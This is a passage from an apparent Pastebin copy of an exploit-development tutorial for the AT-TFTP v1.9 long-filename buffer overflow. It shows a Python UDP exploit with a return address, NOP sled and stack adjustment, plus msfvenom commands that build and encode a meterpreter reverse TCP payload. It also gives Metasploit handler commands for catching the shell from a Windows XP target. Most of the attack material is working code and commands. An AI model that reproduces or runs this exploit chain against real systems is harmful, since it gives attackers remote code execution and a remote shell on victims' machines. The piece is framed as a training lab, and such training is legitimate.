  1949. -Translated into commands, this is instructing the esp register to add 40 bytes and return. Necessary to position esp correctly for our exploit.
  1950.  
  1951. -sploit<< "\x00" + "netascii" + ...
  1952.  
  1953. -The final string of our exploit, this terminates the data stream in a format AT-TFTP is expecting.
  1954. -udp_sock.put(sploit)
  1955.  
  1956.  
  1957. -This instructs Metasploit to send the exploit via UDP.
  1958.  
  1959. disconnect_udp
  1960.  
  1961.  
  1962. -Self-explanatory but this signifies it has finished with the UDP socket.
  1963. -Adapting Each Part
  1964.  
  1965. -Let’s summarize what we need to achieve in our own exploit for it to get working based on the above, highlighted
  1966. areas.
  1967. ●     Create an appropriately sized NOP sled based off the size of LHOST
  1968. ●     Nominate the return address and pack it in little endian format
  1969. ●     Generate shellcode suitable for our situation (LHOST, etc)
  1970. ●     Perform stack adjustment on the shellcode so our second stage can write correctly
  1971. ●     Send the exploit over UDP with Python
  1972.  
  1973. About the only step in there which should sound a little challenging is this stack adjustment business, but really as with all things it’s a lot easier than it sounds.
  1974.  
  1975. -Let’s begin with a very bare bones UDP framework for sending information to the target.
  1976.  
  1977. #nano at-tftp.py
  1978. # AT-TFTP v1.9 Exploit
  1979. # Written for Strategic Security
  1980. import sys, socket
  1981. # Use in the form "python attftp_long_filename.py <IP Address> <Port> <Your IP Address>"
  1982. host = sys.argv[1]                          # Receive IP from user
  1983. port = int(sys.argv[2])                 # Receive Port from user
  1984. exploit = ""                                        # Out future exploit location
  1985. client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # Declare a UDP socket
  1986. client.sendto(exploit, (host, port))                                                        # Send the exploit
  1987.  
  1988. over UDP to the nominated addresses
  1989.  
  1990.  
  1991.  
  1992. -Now from here a lot of the information is going to be straight translations from the ruby counterparts. This includes creating the appropriate sized NOPs and the return address, along with the information we know will be sent to set up the exploit itself. Let’s incorporate that into our framework.
  1993.  
  1994. # AT-TFTP v1.9 Exploit
  1995. # Written for Strategic Security
  1996. import sys, socket
  1997.  
  1998. # Use in the form "python attftp_long_filename.py <Target IP Address> <Port> <Your IP
  1999.  
  2000. Address>"
  2001. host = sys.argv[1]                          # Receive IP from user
  2002. lhost = sys.argv[3]
  2003. port = int(sys.argv[2])                 # Receive Port from user
  2004. ret = "\x53\x93\x42\x7e"            # Return address - Source Metasploit (Little Endian)
  2005. nop = "\x90" * (25-len(lhost))  # Create a NOP string as to bring NOPs + LHOST up to 25 bytes
  2006. payload = ""                                    # Payload to be calculated
  2007. exploit = "\x00\x02" + nop + payload + ret + "\x83\xc4\x28\xc3\x00netascii\x00"     # Our exploit so far
  2008. client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Declare a UDP socket
  2009. client.sendto(exploit, (host, port))            # Send the exploit over UDP to the nominated
  2010. addresses
  2011.  
  2012.  
  2013.  
  2014.  
  2015. -Now we’ve got the known information we need to take the next step and factor in the stack adjustment for our staged payload.
  2016.  
  2017.  
  2018. -Stack Adjustment
  2019.  
  2020. -First we need to dump our payload into a raw hex file for further manipulation. Our payload, in this case, is going to be the meterpreter shell windows/meterpreter/reverse_nonx_tcp, chosen for it’s particularly small code footprint.
  2021.  
  2022. -We use the command,
  2023.  
  2024. ./msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=192.168.153.164 LPORT=4443 -a Windows -a x86 -o payload
  2025.  
  2026.  
  2027.  
  2028. -If we wish to confirm this has successfully outputted to the file we can use the command
  2029.  
  2030. #hexdump -C payload
  2031.  
  2032.  
  2033. -This will also come in handy when comparing the file against the post stack adjustment version. Next we need to find out what command we actually need to use to adjust the stack -3500 bytes.
  2034. This can be done using the Metasploit tool nasm_shell.rb, located here
  2035.  
  2036. /usr/share/metasploit-framework/tools/nasm_shell.rb.
  2037.  
  2038. -Putting in an assembly command will give you the hex machine instruction for that command. Since we want to subtract 3500 (0xDAC in hex) from the stack pointer we do the following,
  2039. Install nasm before proceeding to the next command
  2040.  
  2041. #sudo apt-get install nasm
  2042. #ruby /home/strategicsec/toolz/metasploit/tools/nasm_shell.rb
  2043. nasm > sub esp, 0xDAC
  2044. 00000000  81ECAC0D0000      sub esp,0xdac
  2045.  
  2046.  
  2047.  
  2048. -This tells us we need to use the commands 81EC AC0D 0000 to achieve adjusting the stack by 3500. We output this into a raw hex file. You can do it however you wish, such as with a hex editor, but a quick one line example with Perl is as follows,
  2049.  
  2050. #perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
  2051.  
  2052. -We now have two raw files - stackadj and our payload. We want to combine them both together which is a simple cat command,
  2053.  
  2054. #cat stackadj payload > shellcode
  2055.  
  2056. -To confirm we now have the file in a correct format we once more examine it with hexdump and compare it against our previous dump.
  2057.  
  2058. # hexdump -C shellcode
  2059.  
  2060.  
  2061.  
  2062. -It’s exactly the same as our past payload but with the stack adjustment having taken place at the start of the exploit. We’re almost done now, but we have one final step we need to do to the shellcode.
  2063.  
  2064. Encoding Shellcode
  2065.  
  2066. -In both our stack adjustment command and the payload itself, there are null characters which we need to remove. Msfencode comes to our rescue once again and we can reencode the payload without nulls.
  2067.  
  2068. strategicsec@ubuntu:~/toolz/metasploit$ cat shellcode | sudo ./msfvenom -b '\x00' -e x86/shikata_ga_nai -a x86 --platform win -f python
  2069.  
  2070.  
  2071.  
  2072. We can now cut and paste this shellcode into our python exploit. The final exploits look like the below.
  2073.  
  2074. Final Stand Alone Exploit
  2075.  
  2076.  
  2077.  
  2078.  
  2079.  
  2080. Running the Exploit
  2081.  
  2082.  
  2083. - Let’s test this against our Windows XP victim. Install AT-TFTP v1.9 from the link in the requirements. Ensure you unblock any firewall prompts to allow access. Because this is a staged payload, we need to set up Metasploit to catch the incoming shell. It will then send the second much larger buffer (770048 bytes) that we could never have fit into our exploit itself. Run the commands sequentially,
  2084.  
  2085. #msfconsole
  2086. use exploit/multi/handler
  2087. set payload windows/meterpreter/reverse_nonx_tcp
  2088. set LHOST 192.168.153.164
  2089. set LPORT 4443
  2090. exploit
  2091.  
  2092.  
  2093. - Now the fun stuff, we run the command,
  2094.  
  2095. # python at-tftp.py 192.168.153.164 69 192.168.153.163
  2096.  
  2097. - It goes without saying you should put in your own IP values, but it should maintain the format python. All going well, this is the result…
  2098.  
  2099.  
  2100. Congratulations, you’ve successfully modified your first Metasploit module into a standalone exploit.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top